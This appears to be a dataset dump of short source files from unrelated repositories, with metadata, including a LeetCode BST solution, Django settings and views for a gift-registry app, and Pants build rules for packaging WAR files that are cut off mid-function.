blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8ab39253c3c68371ad76627741d0833f97e1c4b5 | 3929d114c1bc6aef86402300a8d5b278849d41ae | /701. Insert into a Binary Search Tree.py | 5abb58bce2b3ff9cf773ac80caf45a589b4e5a5e | [] | no_license | lxyshuai/leetcode | ee622235266017cf18da9b484f87c1cf9ceb91d0 | 5f98270fbcd2d28d0f2abd344c3348255a12882a | refs/heads/master | 2020-04-05T21:29:37.140525 | 2018-12-16T13:17:15 | 2018-12-16T13:17:15 | 157,222,620 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,551 | py | """
Given the root node of a binary search tree (BST) and a value to be inserted into the tree, insert the value into the BST. Return the root node of the BST after the insertion. It is guaranteed that the new value does not exist in the original BST.
Note that there may exist multiple valid ways for the insertion, as long as the tree remains a BST after insertion. You can return any of them.
For example,
Given the tree:
4
/ \
2 7
/ \
1 3
And the value to insert: 5
You can return this binary search tree:
4
/ \
2 7
/ \ /
1 3 5
This tree is also valid:
5
/ \
2 7
/ \
1 3
\
4
"""
# Definition for a binary tree node.
class TreeNode(object):
    # Basic binary-tree node: a value plus optional left/right children.
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None
class Solution(object):
    def insertIntoBST(self, root, val):
        """Insert ``val`` into the BST and return its (possibly new) root.

        :type root: TreeNode
        :type val: int
        :rtype: TreeNode
        """
        if root is None:
            return TreeNode(val)
        node = root
        while True:
            if val < node.val:
                if node.left is None:
                    node.left = TreeNode(val)
                    break
                node = node.left
            elif val > node.val:
                if node.right is None:
                    node.right = TreeNode(val)
                    break
                node = node.right
            else:
                # The problem guarantees no duplicates; leave the tree as-is.
                break
        return root
| [
"442536013@qq.com"
] | 442536013@qq.com |
dc309c761d457be4dcea5b7d6967cc27013e4e07 | 209a7a4023a9a79693ec1f6e8045646496d1ea71 | /COMP0016_2020_21_Team12-datasetsExperimentsAna/pwa/FADapp/pythonScripts/venv/Lib/site-packages/aniso8601/exceptions.py | 887cfbd010261406a1330c553a6636ff210ef2f6 | [
"MIT"
] | permissive | anzhao920/MicrosoftProject15_Invictus | 5e2347015411bbffbdf0ceb059df854661fb240c | 15f44eebb09561acbbe7b6730dfadf141e4c166d | refs/heads/main | 2023-04-16T13:24:39.332492 | 2021-04-27T00:47:13 | 2021-04-27T00:47:13 | 361,913,170 | 0 | 0 | MIT | 2021-04-26T22:41:56 | 2021-04-26T22:41:55 | null | UTF-8 | Python | false | false | 1,182 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2021, Brandon Nielsen
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the BSD license. See the LICENSE file for details.
class ISOFormatError(ValueError):
    """Raised when ISO 8601 string fails a format check."""
class NegativeDurationError(ValueError):
    """Raised when a duration is negative."""
class YearOutOfBoundsError(ValueError):
    """Raised when year exceeds limits."""
class WeekOutOfBoundsError(ValueError):
    """Raised when week exceeds a year."""
class DayOutOfBoundsError(ValueError):
    """Raised when day is outside of 1..365, 1..366 for leap year."""
class HoursOutOfBoundsError(ValueError):
    """Raised when parsed hours are greater than 24."""
class MinutesOutOfBoundsError(ValueError):
    """Raised when parsed minutes are greater than 60."""
class SecondsOutOfBoundsError(ValueError):
    """Raised when parsed seconds are greater than 60."""
class MidnightBoundsError(ValueError):
    """Raised when parsed time has an hour of 24 but is not midnight."""
class LeapSecondError(NotImplementedError):
    """Raised when attempting to parse a leap second."""
| [
"ana.kapros@yahoo.ro"
] | ana.kapros@yahoo.ro |
c2e612ddf1c155b9790bbcbab3b932deecd1ebe2 | dddbf58aa36d9779f1e50e2d761e93fb7580b835 | /settings.py | 9d107f569ede8b4149aab50b91ae1c74772489af | [] | no_license | powellc/lobby_slideshow | 7566933707554b1f4188bd116fcdf51668442d0d | b1fc222c14dd4a9bda5665a7ade6dbe1a20b7d1d | refs/heads/master | 2021-01-02T22:19:23.065149 | 2014-03-07T19:51:33 | 2014-03-07T19:51:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,516 | py | # Django settings for lobby_adamsschool_com project.
import os
import sys
gettext = lambda s: s
PROJECT_PATH = os.path.abspath(os.path.dirname(__file__))
PUBLIC_DIR = os.path.join(PROJECT_PATH, 'public')
LOBBY_HOME = os.path.join(PUBLIC_DIR, 'lobby')
sys.path.insert(0, os.path.join(PROJECT_PATH, "apps"))
ADMINS = (
('Colin Powell', 'colin.powell@gmail.com'),
)
MANAGERS = ADMINS
TIME_ZONE = 'America/New_York'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = False
USE_L10N = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
gettext_noop = lambda s: s
LANGUAGES = [
('en', gettext_noop('English')),
]
MEDIA_ROOT = os.path.join(LOBBY_HOME, 'media')
STATIC_ROOT = os.path.join(PUBLIC_DIR, 'static')
MEDIA_URL = "/media/"
STATIC_URL = '/static/'
ADMIN_MEDIA_PREFIX = os.path.join(PUBLIC_DIR, "static/admin")
THUMBNAIL_BASEDIR = 'cache'
from imp import find_module
STATICFILES_DIRS = (
os.path.join(os.path.abspath(find_module("debug_toolbar")[1]), 'media'),
os.path.join(os.path.abspath(find_module("superslides")[1]), 'media'),
os.path.join(PROJECT_PATH, 'static'),
)
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'lobby_slideshow.wsgi.application'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
DEBUG_TOOLBAR_MEDIA_ROOT = os.path.join(STATIC_ROOT, 'debug_toolbar')
# Make this unique, and don't share it with anybody.
SECRET_KEY = '=uwxb__g7_w1f7kqznn4fddmgo-y(6)x@fn2lxq(lptb0pqj09'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'urls'
TEMPLATE_DIRS = (
os.path.join(PROJECT_PATH, "templates")
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'django.contrib.admindocs',
'south',
'django_extensions',
'debug_toolbar',
'superslides',
'easy_thumbnails',
)
SUPERSLIDES_ROOT = 'slides'
SUPERSLIDES_SLIDE_SIZE = '1300x800'
THUMBNAIL_ALIASES = {
'': {
'slideshow': {'size': (1300, 800), 'crop': False},
},
}
TINYMCE_DEFAULT_CONFIG = {
'plugins': "table,spellchecker,paste,searchreplace",
'theme': "advanced",
}
TINYMCE_SPELLCHECKER = True
TINYMCE_COMPRESSOR = True
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
from local_settings import *
| [
"colin.powell@gmail.com"
] | colin.powell@gmail.com |
efacaba6ff291bba29e7c9f3869a4f4493c615f2 | 65b265426676b9e5ea72e6787ad82fab3446920a | /main.py | 28c53eef4aa2d4e2ec7677b58da224206510035d | [] | no_license | podder-ai/podder-task-sample-tessaract | 47c3687a1d9483f29d9f1b913ddddb2ccfcc2606 | ef8dfa723e0d3dba81363982ab9152c5bfea46e0 | refs/heads/master | 2022-12-02T13:24:05.814188 | 2019-11-17T04:46:33 | 2019-11-17T04:46:33 | 222,094,410 | 0 | 0 | null | 2022-11-22T04:50:00 | 2019-11-16T12:14:30 | Python | UTF-8 | Python | false | false | 259 | py | import uuid
from app.task import Task
from podder_task_foundation import MODE
DAG_ID = "___dag_id___"
def main() -> None:
    """Run the Podder task once in console mode with a fresh job id."""
    task = Task(MODE.CONSOLE)
    # uuid1 is time-based, giving each run a unique job identifier.
    job_id = str(uuid.uuid1())
    task.handle(job_id, DAG_ID)
if __name__ == "__main__":
main()
| [
"takaaki.mizuno@gmail.com"
] | takaaki.mizuno@gmail.com |
ed6d9c2ba7ef83ea5ce9da0efe39162f598deded | 1548ce77537dcd50ab04b0eaee050b5d30553e23 | /autotabular/constants.py | c0ad9e5d846e8aca277e0a36426e69307ed79833 | [
"Apache-2.0"
] | permissive | Shamoo100/AutoTabular | 4a20e349104246bf825ebceae33dca0a79928f2e | 7d71bf01d2b7d84fcf5f65c9f45c5cea1255d8a2 | refs/heads/main | 2023-08-13T21:34:34.329888 | 2021-10-02T07:06:00 | 2021-10-02T07:06:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 920 | py | BINARY_CLASSIFICATION = 1
MULTICLASS_CLASSIFICATION = 2
MULTILABEL_CLASSIFICATION = 3
REGRESSION = 4
MULTIOUTPUT_REGRESSION = 5
# Groupings used to test which family a task id belongs to.
REGRESSION_TASKS = [REGRESSION, MULTIOUTPUT_REGRESSION]
CLASSIFICATION_TASKS = [
    BINARY_CLASSIFICATION, MULTICLASS_CLASSIFICATION, MULTILABEL_CLASSIFICATION
]
TASK_TYPES = REGRESSION_TASKS + CLASSIFICATION_TASKS
# Bidirectional mappings between integer task ids and their string names.
TASK_TYPES_TO_STRING = \
    {BINARY_CLASSIFICATION: 'binary.classification',
     MULTICLASS_CLASSIFICATION: 'multiclass.classification',
     MULTILABEL_CLASSIFICATION: 'multilabel.classification',
     REGRESSION: 'regression',
     MULTIOUTPUT_REGRESSION: 'multioutput.regression'}
STRING_TO_TASK_TYPES = \
    {'binary.classification': BINARY_CLASSIFICATION,
     'multiclass.classification': MULTICLASS_CLASSIFICATION,
     'multilabel.classification': MULTILABEL_CLASSIFICATION,
     'regression': REGRESSION,
     'multioutput.regression': MULTIOUTPUT_REGRESSION}
| [
"jianzhnie@126.com"
] | jianzhnie@126.com |
438d6c4940c8513fdd919f483d63f2bfc6b96bc8 | b767d5e8c5a32d360196ff3b89efc42dce0071b3 | /blog/acl/views.py | deae34df69b4570befe5e51dbec27d7a352187c5 | [] | no_license | wangjiancn/back-end_blog | 749d40a1c447975408a5538c33ac334d826d5d2c | da79506169573df7d48784f5f109be61e59edc7b | refs/heads/master | 2022-12-11T06:34:17.641252 | 2020-04-13T13:13:35 | 2020-04-13T14:24:26 | 186,651,614 | 1 | 0 | null | 2022-05-25T02:48:28 | 2019-05-14T15:35:24 | Python | UTF-8 | Python | false | false | 813 | py | import json
from django.views.decorators.http import require_POST
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth import authenticate
from .models import UserProfile
from .auth_wrap import token_required
from utils.api_response import APIResponse, APIResponseError
@require_POST
@csrf_exempt
def register(r):
    """Register: create a user from the JSON request body, return its token."""
    data = json.loads(r.body)
    user = UserProfile.objects.create_user(**data)
    return APIResponse(user.token)
@csrf_exempt
@require_POST
def login(r):
    """Log in: authenticate the JSON credentials and return a token."""
    data = json.loads(r.body)
    user = authenticate(**data)
    if user is not None:
        return APIResponse(user.token)
    else:
        # 10005: error code returned when authentication fails
        # (codes defined in utils.api_response).
        return APIResponseError(10005)
@token_required
@require_POST
@csrf_exempt
def logout(r):
    """Log out: return an empty success response.

    NOTE(review): nothing is invalidated server-side here — confirm that
    tokens are stateless or revoked elsewhere.
    """
    return APIResponse()
| [
"wangjianchn@outlook.com"
] | wangjianchn@outlook.com |
68fff833f3fd4310916ca1b8d9065f46d4002a05 | 9cc1b58d0319308da98187d071295b2fabf1f080 | /TQC_考題練習/b0526_TQC證照_301.py | 37df2111df4e754b9ad91e97a2c89db29fd43817 | [
"MIT"
] | permissive | Arwen0905/Python_Test | 60d1dee383c9cf27df6b93cfde7884c91092229c | c75357e4354a684a9fae41f751dae60d4cf0716c | refs/heads/master | 2023-01-13T13:14:55.355898 | 2020-10-31T18:52:07 | 2020-10-31T18:52:07 | 265,150,874 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | # 1. 題目說明:
# 請開啟PYD301.py檔案,依下列題意進行作答,
# 依輸入值計算總和,使輸出值符合題意要求。
# 作答完成請另存新檔為PYA301.py再進行評分。
# 2. 設計說明:
# 請使用迴圈敘述撰寫一程式,
# 讓使用者輸入兩個正整數a、b(a < b),
# 利用迴圈計算從a開始連加到b的總和。
# 例如:輸入a=1、b=100,
# 則輸出結果為5050(1 + 2 + … + 100 = 5050)。
# 3. 輸入輸出:
# 輸入說明
# 兩個正整數(a、b,且a < b)
# 輸出說明
# 計算從a開始連加到b的總和
# 輸入輸出範例
# 範例輸入
# 66
# 666
# 範例輸出
# 219966
# TODO
# Read the two positive integers (the problem guarantees a < b).
a = int(input())
b = int(input())
ans = 0
if a < b:
    # Arithmetic-series formula: a + (a+1) + ... + b in O(1) instead of a loop.
    ans = (a + b) * (b - a + 1) // 2
    print(ans)
| [
"qq23378452@gmail.com"
] | qq23378452@gmail.com |
831feaf2beaa8177145bc39ad2ed5b7309728577 | e61e8f906b7f1de60fca47ac01293ef695d22a9b | /home/migrations/0003_auto_20181127_2103.py | c688484ad34957611673fae6c50c61d7c7a3a693 | [] | no_license | redcliver/marioseguros | e5f775d129a201e80a55f7ac266952e41ecb9079 | da0aeb3b2625dd0ce35e074d94231066a9483501 | refs/heads/master | 2020-03-30T02:40:21.419727 | 2019-02-04T14:19:36 | 2019-02-04T14:19:36 | 150,642,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,504 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-11-27 21:03
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('home', '0002_auto_20181127_0958'),
]
operations = [
migrations.AddField(
model_name='cliente',
name='inscricao',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='cliente',
name='bairro',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='cliente',
name='cep',
field=models.CharField(blank=True, max_length=10, null=True),
),
migrations.AlterField(
model_name='cliente',
name='cidade',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AlterField(
model_name='cliente',
name='cpf',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='cliente',
name='data_nasc',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, null=True),
),
migrations.AlterField(
model_name='cliente',
name='endereco',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AlterField(
model_name='cliente',
name='estado',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='cliente',
name='numero',
field=models.CharField(blank=True, max_length=6, null=True),
),
migrations.AlterField(
model_name='cliente',
name='rg',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='cliente',
name='rg_uf',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='cliente',
name='venc_habilitacao',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, null=True),
),
]
| [
"igor-peres@hotmail.com"
] | igor-peres@hotmail.com |
5e0ef252f9b0c83b10c62836004ad7774ad55827 | 377420d718094a37da2e170718cecd80435d425a | /google/ads/googleads/v4/services/types/user_interest_service.py | e0da2b7489e7318a888329e4829469e8b0cd7f31 | [
"Apache-2.0"
] | permissive | sammillendo/google-ads-python | ed34e737748e91a0fc5716d21f8dec0a4ae088c1 | a39748521847e85138fca593f3be2681352ad024 | refs/heads/master | 2023-04-13T18:44:09.839378 | 2021-04-22T14:33:09 | 2021-04-22T14:33:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,219 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v4.services",
marshal="google.ads.googleads.v4",
manifest={"GetUserInterestRequest",},
)
class GetUserInterestRequest(proto.Message):
    r"""Request message for
    [UserInterestService.GetUserInterest][google.ads.googleads.v4.services.UserInterestService.GetUserInterest].
    Attributes:
        resource_name (str):
            Required. Resource name of the UserInterest
            to fetch.
    """
    # Field number 1 in the GetUserInterestRequest proto definition.
    resource_name = proto.Field(proto.STRING, number=1)
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"noreply@github.com"
] | sammillendo.noreply@github.com |
429b151fd242a071d82942054526cb5f29dacb65 | e7a48c161eabd4b941f4cc29a8064c5ba2ec1aa3 | /project/apps/tables/views.py | 7c1987ac8cb055cb7b9fd7144915232a31822d6e | [] | no_license | MauricioDinki/mesa-regalos | 7d3d7968990323a828dd58107045d12db1f005a3 | 66dbb879421a2f563b731154462e526036f9d957 | refs/heads/master | 2022-12-12T06:04:36.508639 | 2019-05-30T07:23:21 | 2019-05-30T07:23:21 | 189,360,356 | 0 | 0 | null | 2022-12-08T05:11:50 | 2019-05-30T06:41:55 | Python | UTF-8 | Python | false | false | 3,218 | py | from django.contrib import messages
from django.http import Http404
from django.shortcuts import redirect
from django.template.response import TemplateResponse
from django.urls import reverse, reverse_lazy
from django.views import View
from django.views.generic import FormView, DeleteView, UpdateView, TemplateView
from project.apps.gifts.models import Gift
from project.apps.tables.forms import EventForm, BuyGiftForm
from project.apps.tables.models import Table, TableGift
from project.core.mixins import RequestFormMixin
class EventView(RequestFormMixin, FormView):
    """Create a new event (gift table) and continue to gift selection."""
    template_name = 'events/create.html'
    form_class = EventForm
    success_url = reverse_lazy('gifts:gifts')
    def form_valid(self, form):
        # Persist the event before redirecting to the success URL.
        form.save()
        return super(EventView, self).form_valid(form)
class TableDeleteView(DeleteView):
    """Confirm and delete a table; only its owner may delete it."""
    model = Table
    template_name = 'tables/delete.html'
    success_url = reverse_lazy('users:profile')
    def get_object(self, queryset=None):
        """ Hook to ensure object is owned by request.user. """
        obj = super(TableDeleteView, self).get_object()
        if not obj.user == self.request.user:
            # Hide other users' tables behind a 404 rather than revealing them.
            raise Http404
        return obj
class TableUpdate(RequestFormMixin, UpdateView):
    """Edit an event table; only its owner may update it."""
    template_name = 'tables/update.html'
    form_class = EventForm
    success_url = reverse_lazy('users:profile')
    pk_url_kwarg = 'pk'
    def get_object(self, queryset=None):
        """Return the table, raising 404 when missing or owned by another user."""
        pk = self.kwargs.get('pk')
        try:
            obj = Table.objects.get(pk=pk)
        except Table.DoesNotExist:
            # An unknown pk should surface as a 404, not an unhandled 500.
            raise Http404
        if not obj.user == self.request.user:
            raise Http404
        return obj
class TableDetailView(TemplateView):
    """Owner-only detail page showing a table and its gifts."""
    template_name = 'tables/detail.html'
    def get_context_data(self, **kwargs):
        context = super(TableDetailView, self).get_context_data(**kwargs)
        pk = kwargs.get('pk')
        try:
            obj = Table.objects.get(pk=pk)
        except Table.DoesNotExist:
            # An unknown pk should surface as a 404, not an unhandled 500.
            raise Http404
        if not obj.user == self.request.user:
            raise Http404
        gifts = TableGift.objects.filter(table=obj)
        context['table'] = obj
        context['gifts'] = gifts
        return context
class SelectGiftView(View):
    """Page where guests pick a gift from a table.

    NOTE(review): no ownership check here — presumably intentional since
    guests (not the owner) browse this page; confirm.
    """
    def get_context_data(self, **kwargs):
        pk = kwargs.get('pk')
        table = Table.objects.get(pk=pk)
        gifts = TableGift.objects.filter(table=table)
        context = {
            'table': table,
            'gifts': gifts
        }
        return context
    def get(self, request, **kwargs):
        context = self.get_context_data(**kwargs)
        return TemplateResponse(request, 'tables/select.html', context)
class BuyGiftView(View):
    """Guest flow for buying a specific gift (``id``) from a table (``pk``)."""
    def get_context_data(self, **kwargs):
        table = Table.objects.get(pk=kwargs.get('pk'))
        gift = Gift.objects.get(pk=kwargs.get('id'))
        form = BuyGiftForm()
        context = {
            'table': table,
            'gift': gift,
            'form': form,
        }
        return context
    def get(self, request, **kwargs):
        context = self.get_context_data(**kwargs)
        return TemplateResponse(request, 'tables/buy.html', context)
    def post(self, request, **kwargs):
        context = self.get_context_data(**kwargs)
        buy_gift_form = BuyGiftForm(
            request.POST,
            request=request,
            table=context['table'],
            gift=context['gift'],
        )
        if buy_gift_form.is_valid():
            buy_gift_form.save()
            messages.info(request, "Felicidades, la compra fue completada con exito")
            return redirect(reverse_lazy('tables:select_gift', kwargs={'pk': kwargs.get('pk')}))
        # Re-render the form with validation errors when the purchase fails.
        context['form'] = buy_gift_form
        return TemplateResponse(request, 'tables/buy.html', context)
"mauriciodinki@gmail.com"
] | mauriciodinki@gmail.com |
5f1ebaaf134e28a2cce175fab00ab1e2933603c3 | 5db0fab37c2b8a618d85d3b60fab9f806c416474 | /src/python/pants/jvm/package/war.py | 31c96a849f1c243e7a90c996c3d22ed4cd110ea1 | [
"Apache-2.0"
] | permissive | pantsbuild/pants | 4988d1ac5474ec95f94ce2218aeb759401e4b011 | 98cbda8545f0d58c586ed2daa76fefd729d5e0d5 | refs/heads/main | 2023-09-05T03:44:17.646899 | 2023-09-01T19:52:09 | 2023-09-01T19:52:09 | 7,209,075 | 2,708 | 593 | Apache-2.0 | 2023-09-14T19:33:33 | 2012-12-17T17:39:04 | Python | UTF-8 | Python | false | false | 7,675 | py | # Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import logging
import textwrap
from dataclasses import dataclass
from pathlib import PurePath
from typing import Iterable
from pants.build_graph.address import Address
from pants.core.goals.package import (
BuiltPackage,
BuiltPackageArtifact,
OutputPathField,
PackageFieldSet,
)
from pants.core.target_types import FileSourceField, ResourceSourceField
from pants.core.util_rules.source_files import SourceFiles, SourceFilesRequest
from pants.core.util_rules.system_binaries import BashBinary, ZipBinary
from pants.engine.addresses import Addresses, UnparsedAddressInputs
from pants.engine.fs import (
EMPTY_DIGEST,
AddPrefix,
CreateDigest,
Digest,
DigestEntries,
DigestSubset,
Directory,
FileContent,
FileEntry,
MergeDigests,
PathGlobs,
)
from pants.engine.internals.selectors import MultiGet
from pants.engine.process import Process, ProcessResult
from pants.engine.rules import Get, collect_rules, rule
from pants.engine.target import (
DependenciesRequest,
HydratedSources,
HydrateSourcesRequest,
SourcesField,
Targets,
)
from pants.engine.unions import UnionRule
from pants.jvm.classpath import Classpath
from pants.jvm.shading.rules import ShadedJar, ShadeJarRequest
from pants.jvm.target_types import (
JvmShadingRule,
JvmWarContentField,
JvmWarDependenciesField,
JvmWarDescriptorAddressField,
JvmWarShadingRulesField,
)
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class PackageWarFileFieldSet(PackageFieldSet):
    """Field set consumed by the `package` goal to build a WAR file."""
    required_fields = (
        JvmWarDependenciesField,
        JvmWarDescriptorAddressField,
    )
    output_path: OutputPathField
    dependencies: JvmWarDependenciesField
    descriptor: JvmWarDescriptorAddressField
    content: JvmWarContentField
    shading_rules: JvmWarShadingRulesField
@dataclass(frozen=True)
class RenderWarDeploymentDescriptorRequest:
    """Request to stage a target's deployment descriptor into the WAR layout."""
    descriptor: JvmWarDescriptorAddressField
    owning_address: Address
@dataclass(frozen=True)
class RenderedWarDeploymentDescriptor:
    """Digest containing `__war__/WEB-INF/web.xml`."""
    digest: Digest
@dataclass(frozen=True)
class RenderWarContentRequest:
    """Request to stage extra resources/files into the WAR layout."""
    content: JvmWarContentField
@dataclass(frozen=True)
class RenderedWarContent:
    """Digest with the staged extra content under the `__war__` prefix."""
    digest: Digest
async def _apply_shading_rules_to_classpath(
    classpath: Classpath, shading_rules: Iterable[JvmShadingRule] | None
) -> Digest:
    """Merge the classpath, shading each contained JAR when rules are given.

    Returns the merged digest untouched when there are no shading rules, and
    EMPTY_DIGEST when shading was requested but the classpath holds no JARs.
    """
    input_digest = await Get(Digest, MergeDigests(classpath.digests()))
    if not shading_rules:
        return input_digest
    jars_digest = await Get(Digest, DigestSubset(input_digest, PathGlobs(["**/*.jar"])))
    digest_entries = await Get(DigestEntries, Digest, jars_digest)
    jar_entries = [entry for entry in digest_entries if isinstance(entry, FileEntry)]
    if not jar_entries:
        return EMPTY_DIGEST
    # Shade each JAR in its own single-file digest, then merge the results.
    jar_digests = await MultiGet(Get(Digest, CreateDigest([entry])) for entry in jar_entries)
    shaded_jars = await MultiGet(
        Get(ShadedJar, ShadeJarRequest(path=entry.path, digest=digest, rules=shading_rules))
        for entry, digest in zip(jar_entries, jar_digests)
    )
    return await Get(Digest, MergeDigests([shaded.digest for shaded in shaded_jars]))
@rule
async def package_war(
    field_set: PackageWarFileFieldSet,
    bash: BashBinary,
    zip: ZipBinary,
) -> BuiltPackage:
    """Assemble a WAR: (shaded) classpath JARs + web.xml + extra content, zipped."""
    classpath = await Get(Classpath, DependenciesRequest(field_set.dependencies))
    all_jar_files_digest = await _apply_shading_rules_to_classpath(
        classpath, field_set.shading_rules.value
    )
    # Stage the WAR ingredients and the packaging script concurrently.
    prefixed_jars_digest, content, descriptor, input_setup_digest = await MultiGet(
        Get(Digest, AddPrefix(all_jar_files_digest, "__war__/WEB-INF/lib")),
        Get(RenderedWarContent, RenderWarContentRequest(field_set.content)),
        Get(
            RenderedWarDeploymentDescriptor,
            RenderWarDeploymentDescriptorRequest(field_set.descriptor, field_set.address),
        ),
        Get(
            Digest,
            CreateDigest(
                [
                    FileContent(
                        "make_war.sh",
                        textwrap.dedent(
                            f"""\
                            cd __war__
                            {zip.path} ../output.war -r .
                            """
                        ).encode(),
                        is_executable=True,
                    ),
                    Directory("__war__/WEB-INF/classes"),
                    Directory("__war__/WEB-INF/lib"),
                ]
            ),
        ),
    )
    input_digest = await Get(
        Digest,
        MergeDigests(
            [
                prefixed_jars_digest,
                descriptor.digest,
                content.digest,
                input_setup_digest,
            ]
        ),
    )
    result = await Get(
        ProcessResult,
        Process(
            [bash.path, "make_war.sh"],
            input_digest=input_digest,
            output_files=("output.war",),
            description=f"Assemble WAR file for {field_set.address}",
        ),
    )
    # The zip invocation should yield exactly one output file: output.war.
    output_entries = await Get(DigestEntries, Digest, result.output_digest)
    if len(output_entries) != 1:
        raise AssertionError("No output from war assembly step.")
    output_entry = output_entries[0]
    if not isinstance(output_entry, FileEntry):
        raise AssertionError("Unexpected digest entry")
    # Rename output.war to the target's configured output path.
    output_filename = PurePath(field_set.output_path.value_or_default(file_ending="war"))
    package_digest = await Get(
        Digest, CreateDigest([FileEntry(str(output_filename), output_entry.file_digest)])
    )
    artifact = BuiltPackageArtifact(relpath=str(output_filename))
    return BuiltPackage(digest=package_digest, artifacts=(artifact,))
@rule
async def render_war_deployment_descriptor(
    request: RenderWarDeploymentDescriptorRequest,
) -> RenderedWarDeploymentDescriptor:
    """Hydrate the descriptor source and place it at `__war__/WEB-INF/web.xml`."""
    descriptor_sources = await Get(
        HydratedSources,
        HydrateSourcesRequest(request.descriptor),
    )
    descriptor_sources_entries = await Get(
        DigestEntries, Digest, descriptor_sources.snapshot.digest
    )
    # The descriptor field must hydrate to exactly one regular file.
    if len(descriptor_sources_entries) != 1:
        raise AssertionError(
            f"Expected `descriptor` field for {request.descriptor.address} to only refer to one file."
        )
    descriptor_entry = descriptor_sources_entries[0]
    if not isinstance(descriptor_entry, FileEntry):
        raise AssertionError(
            f"Expected `descriptor` field for {request.descriptor.address} to produce a file."
        )
    descriptor_digest = await Get(
        Digest,
        CreateDigest([FileEntry("__war__/WEB-INF/web.xml", descriptor_entry.file_digest)]),
    )
    return RenderedWarDeploymentDescriptor(descriptor_digest)
@rule
async def render_war_content(request: RenderWarContentRequest) -> RenderedWarContent:
    """Collect resource/file sources from `content` targets under `__war__/`."""
    addresses = await Get(
        Addresses, UnparsedAddressInputs, request.content.to_unparsed_address_inputs()
    )
    targets = await Get(Targets, Addresses, addresses)
    sources = await Get(
        SourceFiles,
        SourceFilesRequest(
            [tgt[SourcesField] for tgt in targets if tgt.has_field(SourcesField)],
            for_sources_types=(ResourceSourceField, FileSourceField),
            enable_codegen=True,
        ),
    )
    digest = await Get(Digest, AddPrefix(sources.snapshot.digest, "__war__"))
